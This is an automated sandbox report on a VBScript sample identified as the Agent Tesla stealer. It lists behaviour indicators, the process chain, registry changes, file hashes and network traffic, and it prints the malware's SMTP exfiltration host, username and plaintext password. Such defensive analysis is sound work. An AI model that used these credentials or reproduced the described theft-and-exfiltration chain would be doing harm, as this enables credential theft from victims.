File name: 4126d514421517e58e9d464eea10dc9fb1027b768d37d3ba0e30c1578773479e.vbs

Full analysis: https://app.any.run/tasks/191cfb73-a818-4cd5-83c3-d64b216f32a8
Verdict: Malicious activity
Threats: Agent Tesla

Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as legitimate software on the dedicated website where this malware is sold.

Analysis date: April 30, 2024, 06:14:24
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags: smtp, exfiltration, stealer, agenttesla
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5: 85A31DABBFFC12693AB3E0B2B9C66FFD
SHA1: 7F6F721BDFC4CE65461BC83DC9604DCAB19F838B
SHA256: 4126D514421517E58E9D464EEA10DC9FB1027B768D37D3BA0E30C1578773479E
SSDEEP: 384:wE/p5dFHavVyD+MDM5E3cj7U1tTK7Yp5qVeTxOlolzrde/5bWOtVHqE7wQ:t/pRPFDM5jj0tTYeV0ideJ5TXF

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Scans artifacts that could help determine the target
      • wab.exe (PID: 6812)
    • AGENTTESLA has been detected (YARA)
      • wab.exe (PID: 6812)
    • Steals credentials from Web Browsers
      • wab.exe (PID: 6812)
    • Actions looks like stealing of personal data
      • wab.exe (PID: 6812)
  • SUSPICIOUS
    • Runs shell command (SCRIPT)
      • wscript.exe (PID: 6036)
    • Starts POWERSHELL.EXE for commands execution
      • wscript.exe (PID: 6036)
      • powershell.exe (PID: 4916)
    • Base64-obfuscated command line is found
      • wscript.exe (PID: 6036)
      • powershell.exe (PID: 4916)
    • Starts CMD.EXE for commands execution
      • powershell.exe (PID: 4916)
      • powershell.exe (PID: 4260)
    • The Powershell connects to the Internet
      • powershell.exe (PID: 4916)
    • Unusual connection from system programs
      • powershell.exe (PID: 4916)
    • Uses base64 encoding (POWERSHELL)
      • powershell.exe (PID: 4916)
      • powershell.exe (PID: 4260)
    • Reads security settings of Internet Explorer
      • wab.exe (PID: 6812)
    • Converts a specified value to a byte (POWERSHELL)
      • powershell.exe (PID: 4260)
    • Checks Windows Trust Settings
      • wab.exe (PID: 6812)
    • The process connected to a server suspected of theft
      • wab.exe (PID: 6812)
    • Connects to SMTP port
      • wab.exe (PID: 6812)
  • INFO
    • Gets data length (POWERSHELL)
      • powershell.exe (PID: 4916)
      • powershell.exe (PID: 4260)
    • Creates or changes the value of an item property via Powershell
      • wscript.exe (PID: 6036)
      • powershell.exe (PID: 4916)
    • Script raised an exception (POWERSHELL)
      • powershell.exe (PID: 4916)
      • powershell.exe (PID: 4260)
    • Uses string split method (POWERSHELL)
      • powershell.exe (PID: 4916)
      • powershell.exe (PID: 4260)
    • Checks proxy server information
      • powershell.exe (PID: 4916)
      • wab.exe (PID: 6812)
    • Converts byte array into ASCII string (POWERSHELL)
      • powershell.exe (PID: 4916)
      • powershell.exe (PID: 4260)
    • Reads the computer name
      • wab.exe (PID: 6812)
    • Checks supported languages
      • wab.exe (PID: 6812)
    • Reads the machine GUID from the registry
      • wab.exe (PID: 6812)
    • Reads the software policy settings
      • wab.exe (PID: 6812)
      • slui.exe (PID: 6664)
    • Creates files or folders in the user directory
      • wab.exe (PID: 6812)
    • Reads Environment values
      • wab.exe (PID: 6812)
    • Reads Microsoft Office registry keys
      • wab.exe (PID: 6812)
Find more information about signature artifacts and their mapping to the MITRE ATT&CK™ matrix in the full report

AgentTesla

Process: wab.exe (PID 6812)
Protocol: smtp
Host: smtp.ionos.es
Port: 587
Username: rodrigo@diceltro.com
Password: rodrigo87654321
All screenshots are available in the full report
Total processes: 136
Monitored processes: 11
Malicious processes: 4
Suspicious processes: 0

Behavior graph

Processes in the graph, in order: wscript.exe, powershell.exe, conhost.exe, cmd.exe, powershell.exe, cmd.exe, sppextcomobj.exe, slui.exe, wab.exe (#AGENTTESLA), slui.exe, filecoauth.exe

Process information

Columns: PID | CMD | Path | Indicators | Parent process
PID: 2620
CMD: "C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Ensidigheden.Rep && echo f7f81a39-5f63-5b42-9efd-1f13b5431005"
Path: C:\Windows\System32\cmd.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
PID: 4260
CMD: "C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell script removed]"
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
PID: 4916
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell script removed]"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 4940
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 6036
CMD: "C:\WINDOWS\System32\WScript.exe" C:\Users\admin\AppData\Local\Temp\4126d514421517e58e9d464eea10dc9fb1027b768d37d3ba0e30c1578773479e.vbs
Path: C:\Windows\System32\wscript.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 6172
CMD: C:\Users\admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileCoAuth.exe -Embedding
Path: C:\Users\admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileCoAuth.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft OneDrive File Co-Authoring Executable
Exit code:
0
Version:
19.043.0304.0013
Modules
Images
c:\users\admin\appdata\local\microsoft\onedrive\19.043.0304.0013\filecoauth.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll
PID: 6296
CMD: "C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Ensidigheden.Rep && echo f7f81a39-5f63-5b42-9efd-1f13b5431005"
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
PID: 6632
CMD: C:\WINDOWS\system32\SppExtComObj.exe -Embedding
Path: C:\Windows\System32\SppExtComObj.Exe
Parent process: svchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
PID: 6664
CMD: "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent
Path: C:\Windows\System32\slui.exe
Parent process: SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 6812
CMD: "C:\Program Files (x86)\windows mail\wab.exe"
Path: C:\Program Files (x86)\Windows Mail\wab.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Contacts
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\program files (x86)\windows mail\wab.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
Total events: 17 897
Read events: 17 866
Write events: 31
Delete events: 0

Modification events

Process | Operation | Key | Name = Value
wscript.exe (PID 6036) | write | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass = 1
wscript.exe (PID 6036) | write | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | IntranetName = 1
wscript.exe (PID 6036) | write | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet = 1
wscript.exe (PID 6036) | write | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect = 0
powershell.exe (PID 4916) | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableFileTracing = 0
powershell.exe (PID 4916) | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableAutoFileTracing = 0
powershell.exe (PID 4916) | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableConsoleTracing = 0
powershell.exe (PID 4916) | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileTracingMask = (blank)
powershell.exe (PID 4916) | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | ConsoleTracingMask = (blank)
powershell.exe (PID 4916) | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | MaxFileSize = 1048576
Executable files: 0
Suspicious files: 9
Text files: 5
Unknown types: 3

Dropped files

PID | Process | Filename | Type
4260 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ze0ixphy.q4u.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4260 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_tn3wuukg.vml.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4260 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary
  MD5: 8E7D26D71A1CAF822C338431F0651251
  SHA256: 495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084
4916 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bzqo30d0.p4c.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4916 | powershell.exe | C:\Users\admin\AppData\Roaming\Ensidigheden.Rep | text
  MD5: 6CA0F4FDEAD6F9135EEBC746F4F2436C
  SHA256: 6CFC3AC70094AD615348CCFF11D99516AAF88B7285784EC0FB792C05519C002A
6172 | FileCoAuth.exe | C:\Users\admin\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2024-04-30.0615.6172.1.odl | binary
  MD5: 0674C7FDEE562AB06E3F11F3E587479B
  SHA256: B726A4ADEE75169C82C617F38172BE802A37E01052AA1206D91A7AEAA4A833C9
6812 | wab.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 | binary
  MD5: E7C091F2BF3A0AA953B677BD0AACC70F
  SHA256: 56B9D3297DC00116BE49B28E151F76E4FCB19665FB3EEDEEAF6C379753EAD3A2
6812 | wab.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | binary
  MD5: AFF59E43FDD3EA82E170CE728F1A9DD4
  SHA256: 9BDC5F38BE00954A57A68A93239FF1201481A1EAA9787D1F5860750C69207BEA
6812 | wab.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | binary
  MD5: 9520675832BA4C5EA6A8AA61CE32C25B
  SHA256: C5CB6867B8C0B36A196CF103BD14432C74A14E8EAC09E5A4E1F24E6350425D7A
6812 | wab.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | der
  MD5: 6B11A0EFEA747A4CFFD2E63CA1740A2F
  SHA256: 20794B29B0D071E4B632BEA0446B1DEA7EF431942D5C87F8F1D7895F68059367
Download PCAP, analyze network streams, HTTP content and a lot more in the full report

HTTP(S) requests: 10
TCP/UDP connections: 57
DNS requests: 25
Threats: 2

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
4232 | svchost.exe | GET | 200 | 92.122.89.124:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | unknown
4680 | SearchApp.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAzlnDD9eoNTLi0BRrMy%2BWU%3D | unknown | unknown
1604 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | unknown
6732 | SIHClient.exe | GET | 200 | 92.122.89.124:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | unknown
4920 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D | unknown | unknown
6732 | SIHClient.exe | GET | 200 | 92.122.89.124:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | unknown
6812 | wab.exe | GET | 200 | 142.250.74.195:80 | http://ocsp.pki.goog/gsr1/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCEHe9DWzbNvka6iEPxPBY0w0%3D | unknown | unknown
6812 | wab.exe | GET | 200 | 142.250.74.195:80 | http://ocsp.pki.goog/gtsr1/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBQwkcLWD4LqGJ7bE7B1XZsEbmfwUAQU5K8rJnEaK0gnhS9SZizv8IkTcT4CDQIDvFNZazTHGPUBUGY%3D | unknown | unknown
6812 | wab.exe | GET | 200 | 142.250.74.195:80 | http://ocsp.pki.goog/gts1c3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCEFFNAL5y0qOaCU1agms6UWo%3D | unknown | unknown
6812 | wab.exe | GET | 200 | 142.250.74.195:80 | http://ocsp.pki.goog/gts1c3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCEEkpB5wQLOzMEPb%2Fg2UQK5Q%3D | unknown | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4364 | svchost.exe | 239.255.255.250:1900 | unknown
5140 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
4 | System | 192.168.100.255:138 | whitelisted
4232 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
928 | RUXIMICS.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
4916 | powershell.exe | 142.250.185.110:443 | drive.google.com | GOOGLE | US | whitelisted
4916 | powershell.exe | 142.250.184.193:443 | drive.usercontent.google.com | GOOGLE | US | whitelisted
4232 | svchost.exe | 92.122.89.124:80 | www.microsoft.com | Akamai International B.V. | NL | unknown
4680 | SearchApp.exe | 23.47.189.136:443 | www.bing.com | Akamai International B.V. | PT | unknown
4680 | SearchApp.exe | 23.47.189.139:443 | www.bing.com | Akamai International B.V. | PT | unknown

DNS requests

Domain | IP | Reputation
drive.google.com | 142.250.185.110 | shared
drive.usercontent.google.com | 142.250.184.193 | unknown
settings-win.data.microsoft.com | 40.127.240.158 | whitelisted
www.microsoft.com | 92.122.89.124 | whitelisted
www.bing.com | 23.47.189.139, 23.47.188.216, 23.47.189.136, 23.47.189.169 | whitelisted
r.bing.com | 23.47.189.136, 23.47.188.216, 23.47.189.169, 23.47.189.139 | whitelisted
login.live.com | 40.126.32.68, 40.126.32.138, 40.126.32.76, 20.190.160.22, 20.190.160.20, 20.190.160.17, 40.126.32.72, 40.126.32.133 | whitelisted
ocsp.digicert.com | 192.229.221.95 | whitelisted
go.microsoft.com | 2.19.33.158 | whitelisted
client.wns.windows.com | 40.113.110.67 | whitelisted

Threats

PID | Process | Class | Message
6812 | wab.exe | Misc activity | INFO [ANY.RUN] SMTP email client opens transfer with server (EHLO)
6812 | wab.exe | Successful Credential Theft Detected | STEALER [ANY.RUN] Attempt to exfiltrate via SMTP